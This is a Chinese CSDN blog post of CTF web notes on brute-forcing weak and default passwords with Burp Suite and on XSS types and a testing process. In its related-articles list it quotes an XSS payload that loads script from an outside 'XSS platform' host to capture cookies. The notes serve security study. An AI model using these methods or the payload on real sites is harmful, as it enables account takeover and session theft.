CTF-Web 密码口令 XSS

已于 2022-04-26 18:47:47 修改
阅读量1.6k 收藏
点赞数
分类专栏: CTF-web 文章标签: 网络安全
于 2022-04-23 13:41:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52182264/article/details/124356014
版权

密码口令

1.弱口令

使用bp进行爆破密码(常用top100)
一般账号常用"admin"
在这里插入图片描述在这里插入图片描述
找到字节不相等的密码在这里插入图片描述再将密码输入,即可找到

2.默认口令

这个只是去网上查询账号密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.社会工程

二.XSS跨站脚本漏洞

常见类型:
1.储存型(危害最大)
2.反射型
3.DOM型(危害较小,主要在前端)

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导 致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代 码解析执行从而产生危害。

跨站脚本漏洞测试流程

1.  在目标站点上找到输入点,比如查询接口,留言板等;
2.  输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;
3.  通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);
4.  提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;

TIPS:

1.一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS;
2.由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);
3.通过变化不同的script,尝试绕过后台过滤机制;

反射型

所谓反射型是相对于存储型来讲的。

如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储型的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。

而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。

我认为xss产生的原因主要是对html标签审查不严格造成的。

weixin_52182264
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFWEBchallenge:CTF-WEB-challs的集合主要用于审查目的
04-27
**CTFWEBchallenge** 是一个专门用于网络安全领域中Capture The Flag (CTF) 挑战的集合,尤其关注Web安全方面。这个资源库包含了多种不同的Web安全挑战,旨在帮助学习者通过实践来提升自己的技能,理解并检测现实...
BUUCTF ------findkey
qq_64558075的博客
12-17 686
1.拿到文件,老规矩,进行查壳 收集信息,无壳,32位程序 2.拖入ida中 先查找main函数 并没有什么实质性的收获 那么我们就查找字符串 发现flag字符串 跟进 发现右边的数据是红色的,ida不能正常反编译 我们就看汇编代码,寻找原因 发现两个一样的代码,所以这个地方就可以推测是花指令 我们nop(跳过)这个花指令就可以了 首先我们将鼠标的光标放到第二个push 然后修改为90(nop) 然后发现已经修改为nop了 接下来就...
[BUUCTF]Reverse——findKey
mcmuyanga的博客
03-23 516
findKey 例行检查,32位程序,c++写的 运行一下,没什么特别提示的地方 32位ida载入,检索字符串发现flag提示,跟进跳转 会发现中间有一段汇编没有转换成成函数,选中这部分,按p转换成函数,在按f5就能得到关键代码 理一下,贴一下关键代码,这一段应该是计算flag的代码, 根据sub_401005中有md5加密的api调用判断sub_401005是md5加密。 太久没做用API进行字串hash的題目了,去微软的网站上查询了一下才认出来了是md5加密 首先让我们输入string1
CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
最新发布
jayq1的博客
06-07 994
XSS
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
[CTF]Jarvis FindKey
qq_42152365的博客
02-16 710
[CTF]Jarvis FindKey 150 1. 首先看文件头,是03F30D0A,查百度,发现是pyc,于是改成pyc 2. pyc拖入uncompyle(这里用的是uncompyle6),生成py文件 3. 发现密码是17位并且其逆序满足如下关系式,式中的数组已经写死: ord(flag[i]) + pwda[i] & 255 != lookup[i + pwdb[i]]...
buuctf————findkey
yhfgs的博客
09-18 953
1.查壳。无壳,32位。 2.IDA反编译。 shift+f12查找字符串。发现关键词flag。 跟进。 发现IDA没有反编译成功。手动反编译(p键)。 第一次做的时候按了p就出了。复盘的时候不知道又不行了。 又找了找原因发现是花指令。 (这个位置两个一样的push删掉一个就ok) 3.分析代码。关键函数是sub401005. 根据if条件可得string1(MD5加密后)(看最前面sub40101e函数可知string经过了MD5加密) (a2-748)是0...
ctf,web攻防工具-御剑1.5.7z
04-06
3. **漏洞扫描**:御剑会检查各种常见的Web漏洞,如SQL注入、XSS跨站脚本、文件包含漏洞、命令注入等,这些都是Web应用中常见的安全风险。 4. **自动化渗透测试**:通过模拟黑客攻击行为,自动进行多种渗透测试,...
ctfhub web全部做题记录(持续跟新)
01-08
【CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全】Web安全是网络...
CTF工具之御剑后台扫描(web).rar
09-16
【CTF工具之御剑后台扫描(Web)】 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,参赛者通过解决各种安全问题来获取分数。御剑后台扫描工具是专门为CTF比赛设计的一款Web渗透测试工具,主要用于...
ctf500--app登录加密算法.rar
09-30
4. **挑战响应机制**:如TOTP(时间同步一次性密码)和HOTP(基于计数器的一次性密码),常与短消息服务(SMS)或应用生成的动态口令结合,提供额外的安全层。每次登录时,用户需要输入动态生成的一次性密码,即使...
【web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 2386
XSS-pikachu
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 4318
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
BUUCTF刷题 XSS-Lab
weixin_54438700的博客
07-21 867
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")
CTFer成长之路之XSS的魔力
自强不息
02-24 645
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
浅谈一个CTF中xss小案例
m0_68976043的博客
03-03 1277
X-XSS-Protection: 0:关闭XSS防护之后get传参,替换过滤为空,通过过滤保护输出到img src里面三、正常去做无法通过因为这道题出的不严谨所以反引号也是可以绕过的正常考察我们的点不在这里,正常考察的是字符串解码两次编码也是无法绕过的因为&已经给我们防止住了没过滤百分号那我们是不是可以urlcode编码,但是在按下回车的那一下,我们网页自动就给我们又转回来了,等进入程序后又被过滤了那转码我们控制不了,我们可不可以添加一个%25很明显还是不行。
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3317
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHUB刷题 反射型XSS攻击
null1024的博客
09-08 846
一、题目描述与分析 如上图, 进入题目页面,此时第一个框中是CTFHub,出现Hello,CTFHub 输入admin,发现出现变化,变为Hello,admin,可以考虑拼接位置 二、解题过程 输入以下代码,如图,点击Submit <script>alert(1)</script> 结果如图,说明拼接成功。 注册XSS平台,进行攻击,得到flag ...
CTFSHOW XSS漏洞
qq_61553520的博客
04-20 299
这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-第333。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值